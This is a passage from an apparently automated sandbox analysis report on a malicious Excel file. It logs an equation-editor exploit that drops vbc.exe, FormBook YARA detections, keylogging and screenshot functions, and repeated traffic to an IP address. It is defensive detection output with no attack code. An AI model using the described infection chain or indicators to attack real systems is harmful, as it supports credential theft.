Found</h1><p>The requested URL /hno0/ was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.urzeczenie.com Port 80</address></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113
Source: unknown	TCP traffic detected without corresponding DNS query: 13.250.31.113

Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00433B64 GetKeyboardState,

4_2_00433B64

Contains functionality to record screenshots

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00425A40 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

4_2_00425A40

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Detected potential crypto function

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E966E8	0_2_02E966E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E966F3	0_2_02E966F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E96340	0_2_02E96340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E96743	0_2_02E96743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E96753	0_2_02E96753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_02E9CF01	0_2_02E9CF01
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044629C	4_2_0044629C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044B47C	4_2_0044B47C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0044629C	7_2_0044629C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0044B47C	7_2_0044B47C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0044629C	10_2_0044629C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0044B47C	10_2_0044B47C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02071238	12_2_02071238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FCE0C6	12_2_01FCE0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0201A37B	12_2_0201A37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FE905A	12_2_01FE905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_020763BF	12_2_020763BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD3040	12_2_01FD3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FFD005	12_2_01FFD005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FF63DB	12_2_01FF63DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FCF3CF	12_2_01FCF3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0204D06D	12_2_0204D06D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD7353	12_2_01FD7353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD2305	12_2_01FD2305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FCE2E9	12_2_01FCE2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205D13F	12_2_0205D13F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FEC5F0	12_2_01FEC5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02072622	12_2_02072622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0201A634	12_2_0201A634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD351F	12_2_01FD351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FE1489	12_2_01FE1489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205579A	12_2_0205579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_020057C3	12_2_020057C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205443E	12_2_0205443E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FDC7BC	12_2_01FDC7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0200D47D	12_2_0200D47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02005485	12_2_02005485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FDE6C1	12_2_01FDE6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02016540	12_2_02016540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD4680	12_2_01FD4680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_020505E3	12_2_020505E3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FE69FE	12_2_01FE69FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FD29B2	12_2_01FD29B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02083A83	12_2_02083A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FF286D	12_2_01FF286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FDC85C	12_2_01FDC85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0207CBA4	12_2_0207CBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02056BCB	12_2_02056BCB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205DBDA	12_2_0205DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FCFBD7	12_2_01FCFBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0204F8C4	12_2_0204F8C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0206F8EE	12_2_0206F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FF7B00	12_2_01FF7B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205394B	12_2_0205394B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02055955	12_2_02055955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0207098E	12_2_0207098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02002E2F	12_2_02002E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FDCD5B	12_2_01FDCD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205BF14	12_2_0205BF14
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0206CFB1	12_2_0206CFB1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02042FDC	12_2_02042FDC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0205AC5E	12_2_0205AC5E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FFDF7C	12_2_01FFDF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FE0F3F	12_2_01FE0F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_02000D3B	12_2_02000D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_01FEEE4C	12_2_01FEEE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0206FDDD	12_2_0206FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0009D192	12_2_0009D192
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0009B8C6	12_2_0009B8C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0009C953	12_2_0009C953
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00088C7B	12_2_00088C7B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00088C80	12_2_00088C80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0009BCA9	12_2_0009BCA9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00082D87	12_2_00082D87
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00082D90	12_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_0009BDFF	12_2_0009BDFF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00082FB0	12_2_00082FB0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00396F06	12_2_00396F06
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_003932FF	12_2_003932FF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00393302	12_2_00393302
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00391362	12_2_00391362
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00391359	12_2_00391359
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_003957B2	12_2_003957B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_003908FB	12_2_003908FB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00390902	12_2_00390902
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 12_2_00397D02	12_2_00397D02

PE file contains strange resources

Source: binso[1].exe.2.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Odhbljup.exe.4.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Section loaded: ieproxy.dll	Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Yara signature match

Source: 00000007.00000003.560841692.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583392738.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497269548.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584292302.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562335520.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561342324.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560628845.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.497233291.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560576590.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497427116.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583748218.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560966486.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.584057831.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561221425.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562432544.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584430165.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497196939.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497027305.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
